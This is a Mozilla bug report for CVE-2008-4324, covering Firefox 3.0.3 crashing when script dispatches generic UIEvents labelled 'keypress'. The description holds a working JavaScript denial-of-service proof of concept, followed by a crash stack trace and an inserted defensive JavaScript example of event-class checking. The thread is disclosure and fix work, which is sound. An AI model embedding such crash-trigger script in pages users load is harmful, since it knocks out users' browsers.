Bug 457543 (CVE-2008-4324)

Firefox crashes: unhandled User Interface Dispatcher Events

Status: VERIFIED FIXED
Product: Core
Component: DOM: Events
Priority: --
Severity: critical
Reported: 9 years ago
Modified: 9 years ago

People: Reporter: Aditya K Sood, Unassigned

Tracking: Version: 1.9.0 Branch; Keywords: verified1.9.0.4; Points: ---
Bug Flags: blocking1.9.0.4 +, wanted1.8.1.x -
Firefox Tracking Flags: (Not tracked)

Details: Whiteboard: [sg:dupe 454820], URL

(Reporter)

Description

9 years ago
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.30 Safari/525.13
Build Identifier: Mozilla 3.0.3

Mozilla 3.0.3 crashes with an unhandled exception in User Interface Dispatcher Events. If a user tries to restore the session, the 3.0.3 version still crashes.

Reproducible: Always

Steps to Reproduce:
<script language = "JavaScript">
var moz303 = document.createEvent("UIEvents");

moz303.initUIEvent("keypress", true, true, this, 1);
for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++)
{
	document.documentElement.dispatchEvent(moz303);
}


moz303.initUIEvent("click", true, true, this, 1);
for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++)
{
	document.documentElement.dispatchEvent(moz303);
}
</script>

The smaller PoC code.
Actual Results:  
Mozilla crashes straight away.

Expected Results:  
The software should have handled the exception, with some check presented to the user.

The bug is reproduced every time.
(Reporter)

Updated

9 years ago
Severity: normal → critical
CC list accessible: false
Version: unspecified → 3.0 Branch
I see this on Linux as well, on 3.0 but not on mozilla-central.
OS: Windows XP → All
Hardware: PC → All
(Reporter)

Comment 2

9 years ago
But it's really hitting 3.0.3 as per the details provided above.

Need to be fixed.
Also confirming crash in 3.0, does not affect Firefox 2. This looks like a null-deref Denial of Service and could probably be safely unhidden, but I'd like Olli or someone else who knows events to check it out.

Exception Type:  EXC_BAD_ACCESS (SIGBUS)
Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000007
Crashed Thread:  0

Thread 0 Crashed:
0   libxpcom_core.dylib           nsTArray_base::Length() const + 11 (nsTArray.h:66)
1   libgklayout.dylib             nsContentUtils::GetAccelKeyCandidates(nsIDOMEvent*, nsTArray<nsShortcutCandidate>&) + 261 (nsContentUtils.cpp:4083)
2   libgklayout.dylib             nsXBLKeyEventHandler::HandleEvent(nsIDOMEvent*) + 159 (nsXBLEventHandler.cpp:173)
3   libgklayout.dylib             nsEventListenerManager::HandleEventSubType(nsListenerStruct*, nsIDOMEventListener*, nsIDOMEvent*, nsISupports*, unsigned int) + 595 (nsEventListenerManager.cpp:1080)
4   libgklayout.dylib             nsEventListenerManager::HandleEvent(nsPresContext*, nsEvent*, nsIDOMEvent**, nsISupports*, unsigned int, nsEventStatus*) + 1119 (nsEventListenerManager.cpp:1186)
5   libgklayout.dylib             nsEventTargetChainItem::HandleEvent(nsEventChainPostVisitor&, unsigned int) + 396 (nsEventDispatcher.cpp:211)
6   libgklayout.dylib             nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&, unsigned int, nsDispatchingCallback*) + 714 (nsEventDispatcher.cpp:293)
7   libgklayout.dylib             nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&, unsigned int, nsDispatchingCallback*) + 943 (nsEventDispatcher.cpp:323)
8   libgklayout.dylib             nsEventDispatcher::Dispatch(nsISupports*, nsPresContext*, nsEvent*, nsIDOMEvent*, nsEventStatus*, nsDispatchingCallback*) + 1640 (nsEventDispatcher.cpp:483)
9   libgklayout.dylib             nsEventDispatcher::DispatchDOMEvent(nsISupports*, nsEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) + 350 (nsEventDispatcher.cpp:541)
10  libgklayout.dylib             nsEventListenerManager::DispatchEvent(nsIDOMEvent*, int*) + 274 (nsEventListenerManager.cpp:1310)
  ...etc...
Component: Security → DOM: Events
Product: Firefox → Core
QA Contact: firefox → events
Whiteboard: [sg:investigate] null-deref DoS?
Version: 3.0 Branch → 1.9.0 Branch
Status: UNCONFIRMED → NEW
Ever confirmed: true
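The PoC in the description and the stack trace above point at one defensive-coding lesson: the XBL key handler and nsContentUtils::GetAccelKeyCandidates were reached on the strength of the type string "keypress", but what the script dispatched was a generic UIEvent created with createEvent("UIEvents"), carrying none of the data a real key event has. The following is an added example, not code from this bug or from Mozilla: it models that mismatch in plain JavaScript using Node's built-in Event and EventTarget. KeyboardEventLike, keyCandidates, legacyHandler, hardenedHandler, runDispatch and demo are names invented here; KeyboardEventLike stands in for the browser's KeyboardEvent (in a browser the check would be `evt instanceof KeyboardEvent`), and keyCandidates is a hypothetical key-only field, not the real Gecko field name.

```javascript
// Added example (not from the bug report or Mozilla): why a "keypress"
// listener must check the event's actual class, not just its type string.
// Uses Node's built-in Event and EventTarget (Node >= 15); KeyboardEventLike
// stands in for the browser's KeyboardEvent, which Node does not provide.

// Stand-in for a real keyboard event: carries key data a generic event lacks.
class KeyboardEventLike extends Event {
  constructor(type, init = {}) {
    super(type, init);
    this.keyCode = init.keyCode ?? 0;
    // Hypothetical key-only array field (assumed name, not Gecko's).
    this.keyCandidates = init.keyCandidates ?? [];
  }
}

// Legacy handler: trusts the type string and reads key-only fields directly.
// On a generic "keypress" event this throws (the JS analogue of the native crash).
function legacyHandler(evt) {
  return evt.keyCandidates.length;
}

// Hardened handler: verifies the concrete event class before touching key data
// and ignores anything else, however its type string is labelled.
function hardenedHandler(evt) {
  if (!(evt instanceof KeyboardEventLike)) {
    return null;
  }
  return evt.keyCandidates.length;
}

// Dispatches evt to handler through a real EventTarget and records the outcome
// instead of letting an error escape (Node would report it as uncaught).
function runDispatch(handler, evt) {
  const target = new EventTarget();
  const result = { value: undefined, error: null };
  target.addEventListener(evt.type, (e) => {
    try {
      result.value = handler(e);
    } catch (err) {
      result.error = err;
    }
  });
  target.dispatchEvent(evt);
  return result;
}

// Runs both handlers against a genuine key event and a constructed generic
// event whose type merely says "keypress" (what the PoC's initUIEvent yields).
function demo() {
  const realKey = new KeyboardEventLike("keypress", {
    bubbles: true, cancelable: true, keyCode: 65, keyCandidates: [97],
  });
  const fakeKey = new Event("keypress", { bubbles: true, cancelable: true });
  return {
    legacyReal: runDispatch(legacyHandler, realKey),
    legacyFake: runDispatch(legacyHandler, fakeKey),
    hardenedReal: runDispatch(hardenedHandler, realKey),
    hardenedFake: runDispatch(hardenedHandler, fakeKey),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  const r = demo();
  console.log("legacy on generic keypress:", r.legacyFake.error ? r.legacyFake.error.name : "ok");
  console.log("hardened on generic keypress:", r.hardenedFake.value === null ? "ignored" : "handled");
}
```

The point of the class check is that the type name of a DOM event is chosen by whoever dispatches it, so any native or script handler keyed on "keypress" must verify it is holding the event structure it expects before reading key-specific fields; that is the same invariant the crash in GetAccelKeyCandidates shows being violated.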
qawanted: would it be possible to figure out a "fix range" on 3.1 nightlies? maybe we can find a patch that fixed this (if it wasn't a "re-write everything" type change).
Keywords: qawanted
Whiteboard: [sg:investigate] null-deref DoS? → [sg:investigate] null-deref DoS? Fix range?

Comment 5

9 years ago
Didn't Mats just fix this or a variant of this?

Comment 6

9 years ago
(In reply to comment #5)
> Didn't Mats just fix this or a variant of this?
Bug 454820
(Reporter)

Comment 7

9 years ago
So what's the actual update? I think I have given the specific version 3.0.3, and the version details are:

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
(Reporter)

Comment 8

9 years ago
Let me know the specifications about the fix.

Comment 9

9 years ago
I meant the fix is in the latest nightly builds (feel free to try http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-trunk/).
It will be ported to 3.0.x builds.
(Reporter)

Comment 10

9 years ago
Let me know the specifications about the fix.
(Reporter)

Comment 11

9 years ago
Last query: when exactly will it be ported to 3.0.x builds?
Status: NEW → RESOLVED
Last Resolved: 9 years ago
Keywords: qawanted
Resolution: --- → DUPLICATE
Whiteboard: [sg:investigate] null-deref DoS? Fix range? → [sg:dupe 454820]
Duplicate of bug: 454820
CC list accessible: true
(Reporter)

Comment 13

9 years ago
If it was resolved previously, why is it not ported to the 3.0.3 version?
(Reporter)

Comment 14

9 years ago
If it was resolved previously, why is it not ported to the 3.0.3 version?
(Reporter)

Updated

9 years ago
Resolution: DUPLICATE → WONTFIX
It was found and fixed in our "development" version that will become 3.1, general development does not happen on the 3.0.x branch. This was only fixed a couple of weeks ago (Sept 15) after 3.0.2 was in testing. 3.0.3 was a quick turn-around release to fix a broken password manager and took only that fix. 

3.0.4 will be the earliest possible release vehicle for this fix, but the fix needs to be tested to make sure it does not have unintended side effects. Fixing the symptoms turns out to be the easy part, fixing bugs so that they don't cause compatibility problems and break websites is sometimes trickier.
This has been posted to milw0rm:
http://www.milw0rm.com/exploits/6614

I'm going to put the milw0rm reference in the URL field and remove the security flag to forestall duplicate filings.
Original URL was: http://www.secniche.org/moz303
Resolution: WONTFIX → DUPLICATE
Duplicate of bug: 454820
Flags: wanted1.8.1.x-
Flags: blocking1.9.0.4+
This bug is fixed in nightlies by bug 454820, will be fixed in 3.0.4
Depends on: 454820
Resolution: DUPLICATE → FIXED

Updated

9 years ago
Alias: CVE-2008-4324

Updated

9 years ago
Duplicate of this bug: 457851
(In reply to comment #18)
> This bug is fixed in nightlies by bug 454820, will be fixed in 3.0.4

Adding the fixed1.9.0.4 keyword then. :)
Keywords: fixed1.9.0.4
This is verified fixed for 1.9.0.4 with Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4pre) Gecko/2008102304 GranParadiso/3.0.4pre.
Status: RESOLVED → VERIFIED
Keywords: fixed1.9.0.4 → verified1.9.0.4